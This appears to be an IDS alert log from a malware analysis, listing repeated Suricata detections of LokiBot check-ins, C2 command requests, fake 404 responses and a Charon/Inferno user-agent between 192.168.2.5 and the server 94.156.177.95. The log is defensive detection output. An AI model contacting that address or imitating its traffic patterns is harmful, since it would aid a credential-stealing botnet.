Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49839 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49827 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49785
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49909 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49880
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49941 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49909 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49999 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49935 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49935 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49935 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49771
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49875
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49811
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49909 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49999 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49909 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49999 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49851 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49851 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49851 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49839
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50022 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49851 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49851 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49820 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49790
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49827 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49941 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49827 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50014 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49909
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50014 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50014 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49999 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50022
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50014 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50014 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49827
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49935 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49941 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50053 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49941 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49941 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49897 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49897 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49851
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50053 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50053 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49820
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50053 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49999 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49845 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50014
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49889
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49845
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50043 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49862 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50053 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50043 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50053
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50035 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49935 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49941
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49862 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49862 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50026
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50024 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49897 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50024 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50033
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50024 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50056 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50040
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50035
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50038
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49897 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50056 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50049
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49947 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49947 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49869
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49952 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49897 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50056 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50024 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50030
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50024 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50029
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50056 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49935
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49952 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49862 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50041
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49947 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49999
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:50043
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49959 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50056 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49959 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49959 -> 94.156.177.95:80
